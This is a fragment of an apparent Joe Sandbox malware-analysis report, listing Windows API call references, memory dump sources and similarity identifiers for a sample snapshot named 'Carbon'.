                                                            • WSAGetLastError.WSOCK32 ref: 00972292
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00972311
                                                            • WSAGetLastError.WSOCK32 ref: 0097231B
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008F3914: _wcslen.LIBCMT ref: 008F3919
                                                            • _wcslen.LIBCMT ref: 0095E60C
                                                            • _wcslen.LIBCMT ref: 0095E623
                                                            • _wcslen.LIBCMT ref: 0095E64E
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0095E659
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ExtentPoint32Text
                                                            • String ID:
                                                            • API String ID: 3763101759-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00952129
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095213B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00952151
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095216C
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00909DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00909DE2
                                                            • GetClientRect.USER32(?,?), ref: 0098A61D
                                                            • GetCursorPos.USER32(?), ref: 0098A627
                                                            • ScreenToClient.USER32(?,?), ref: 0098A632
                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 0098A666
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0098851F
                                                            • ScreenToClient.USER32(?,?), ref: 00988537
                                                            • ScreenToClient.USER32(?,?), ref: 0098855B
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00988576
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 0091E65D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0095242E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00952328
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 009523AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009524B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d$X64
                                                            • API String ID: 481472006-1077770165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0092C1E4
                                                            • GetLastError.KERNEL32 ref: 0092C1F2
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0092C24D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%